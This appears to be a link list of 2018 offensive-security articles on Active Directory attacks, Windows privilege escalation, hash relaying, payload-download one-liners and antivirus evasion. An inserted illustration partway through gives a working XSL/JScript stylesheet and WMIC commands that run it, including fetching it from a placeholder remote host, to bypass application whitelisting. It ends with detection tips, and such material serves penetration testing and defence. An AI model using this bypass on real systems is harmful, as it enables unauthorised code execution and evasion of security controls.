Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
Speaker Deck
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
Slides from my Track X Thotcon 2018 Workshop entitled:
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
From XML External Entity to NTLM Domain Hashes
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
Windows Privilege Escalation Guide
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Absolomb
Windows Privilege Escalation Guide
Privilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need to know what to check and look for. This takes familiarity with systems that normally comes along with experience. At first privilege escalation can…
Windows oneliners to download remote payload and execute arbitrary code
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
arno0x0x
Windows oneliners to download remote payload and execute arbitrary code
In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an a…
Passing the hash with native RDP client (mstsc.exe)
https://michael-eder.net/post/2018/native_rdp_pass_the_hash/
Escalating privileges with ACLs in Active Directory
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
https://github.com/fox-it/Invoke-ACLPwn
Fox-IT International blog
Escalating privileges with ACLs in Active Directory
Researched and written by Rindert Kramer and Dirk-jan Mollema Introduction During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a f…
Skip Cracking Responder Hashes and Relay Them
http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them
Threat Blog
Skip Cracking Responder Hashes and Relay Them
Background Responder is a go-to tool for most pentesters. We use it quite often on pentests to quickly gain access to a client’s domain. However, when clients enforce strong password policies and their users don’t choose passwords like 'Ilovemykids2017!'…
Exchange-AD-Privesc. Repository of Exchange privilege escalations to Active Directory
This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security.
https://github.com/gdedrouas/Exchange-AD-Privesc
GitHub
GitHub - gdedrouas/Exchange-AD-Privesc: Exchange privilege escalations to Active Directory
Exchange privilege escalations to Active Directory - gdedrouas/Exchange-AD-Privesc
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
https://subt0x11.blogspot.com.br/2018/04/wmicexe-whitelisting-bypass-hacking.html
Blogspot
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
tl;dr WMIC can invoke XSL (eXtensible Stylesheet Language) scripts, either locally or from a URL. Local File wmic process list /FO...
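As an added illustration (not taken from the linked post or its author), this is the shape of the XSL file that the technique relies on: WMIC's /FORMAT switch hands the stylesheet to MSXML, and MSXML's ms:script extension lets the stylesheet carry JScript that then executes inside the trusted, signed wmic.exe process. The file name evil.xsl and the calc.exe payload are assumptions chosen for a harmless demonstration.

```xml
<?xml version="1.0"?>
<!-- Constructed example: an XSL stylesheet with an embedded JScript block.
     The "user" namespace is a placeholder required by implements-prefix. -->
<stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform"
    xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
  <output method="text"/>
  <!-- MSXML evaluates this script when the stylesheet is loaded -->
  <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    // Assumed benign payload: spawn calc.exe as a child of wmic.exe
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]>
  </ms:script>
</stylesheet>
```

Invocation (assumed paths): wmic process list /FORMAT:"C:\temp\evil.xsl" for a local file, or wmic process list /FORMAT:"https://example.invalid/evil.xsl" to fetch it remotely; wmic.exe does the download itself, so no separate downloader binary touches disk. For defenders, the useful telemetry is process-creation logging (Sysmon Event 1 or Windows 4688 with command-line auditing): wmic.exe with a /FORMAT argument that is a URL or a non-standard .xsl path, and wmic.exe appearing as the parent of an unexpected child process, are both signals worth alerting on.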
Hiding Metasploit Shellcode to Evade Windows Defender
https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/
Rapid7
Hiding Metasploit Shellcode to Evade Windows Defender | Rapid7 Blog
If malware development is a cat-and-mouse game, then I would say that the industry creates some of the most terrifying hunters. Learn more.
Detecting hypervisor presence on windows 10
https://revers.engineering/detecting-hypervisor-presence-on-windows-10/
@windowshackinglibrary
Reverse Engineering
Detecting Hypervisor Presence on Windows 10 - Reverse Engineering
Detecting a hypervisor on Windows 10 is relatively simple, but due to the simplistic nature of the currently published detection vectors it’s likely that they are also relatively simple to spoof or remove. In this article we’ll detail a few ways of detecting…
Blue Cloud of Death: Red Teaming Azure
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
@windowshackinglibrary
Speaker Deck
Blue Cloud of Death: Red Teaming Azure
BSides Denver Presentation on May 11 2018
On-demand IT services are being publicized as the “new normal”, but often times these services are misunder…